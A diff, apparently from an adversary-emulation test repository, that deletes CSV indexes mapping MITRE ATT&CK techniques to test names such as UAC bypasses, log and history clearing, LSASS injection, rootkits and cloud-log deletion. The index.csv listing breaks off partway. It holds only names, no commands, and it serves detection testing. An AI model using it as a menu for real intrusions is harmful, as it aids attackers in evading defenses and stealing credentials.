atomics/Indexes/Indexes-CSV/iaas-index.csv
-22
View File
@@ -1,22 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,1,AWS - CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS - CloudWatch Log Stream Deletes,89422c87-b57b-4a04-a12a-802bb11d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 1 AWS - CloudTrail Changes 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e sh
3 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 2 Azure - Eventhub Deletion 5e09bed0-7d33-453b-9bf3-caea32bff719 powershell
4 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 7 AWS - CloudWatch Log Group Deletes 89422c87-b57b-4a04-a8ca-802bb9d06121 sh
5 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 8 AWS - CloudWatch Log Stream Deletes 89422c87-b57b-4a04-a12a-802bb11d06121 sh
6 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 9 AWS CloudWatch Log Stream Deletes 33ca84bc-4259-4943-bd36-4655dc420932 sh
7 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
8 credential-access T1552.005 Unsecured Credentials: Cloud Instance Metadata API 2 Azure - Dump Azure Instance Metadata from Virtual Machines cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7 powershell
9 credential-access T1110.003 Brute Force: Password Spraying 9 AWS - Password Spray an AWS using GoAWSConsoleSpray 9c10d16b-20b1-403a-8e67-50ef7117ed4e sh
10 discovery T1619 Cloud Storage Object Discovery 1 AWS S3 Enumeration 3c7094f8-71ec-4917-aeb8-a633d7ec4ef5 sh
11 discovery T1526 Cloud Service Discovery 1 Azure - Dump Subscription Data with MicroBurst 1e40bb1d-195e-401e-a86b-c192f55e005c powershell
12 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
13 persistence T1136.003 Create Account: Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
14 persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
15 persistence T1098 Account Manipulation 6 Azure - adding user to Azure role in subscription 1a94b3fc-b080-450a-b3d8-6d9b57b472ea powershell
16 persistence T1098 Account Manipulation 7 Azure - adding service principal to Azure role in subscription c8f4bc29-a151-48da-b3be-4680af56f404 powershell
17 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
18 collection T1530 Data from Cloud Storage Object 1 Azure - Enumerate Azure Blobs with MicroBurst 3dab4bcc-667f-4459-aea7-4162dd2d6590 powershell
19 collection T1530 Data from Cloud Storage Object 2 Azure - Scan for Anonymous Access to Azure Storage (Powershell) 146af1f1-b74e-4aa7-9895-505eb559b4b0 powershell
20 collection T1530 Data from Cloud Storage Object 3 AWS - Scan for Anonymous Access to S3 979356b9-b588-4e49-bba4-c35517c484f5 sh
21 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
22 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
atomics/Indexes/Indexes-CSV/index.csv
-1458
View File
@@ -1,1458 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,3,Rundll32 execute VBscript command using Ordinal number,32d1cf1b-cbc2-4c09-8d05-07ec5c83a821,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,4,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,5,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,6,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,7,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,8,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,9,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,10,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,4,InstallUtil Install method call,9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,5,InstallUtil Uninstall method call - /U variant,34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,6,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
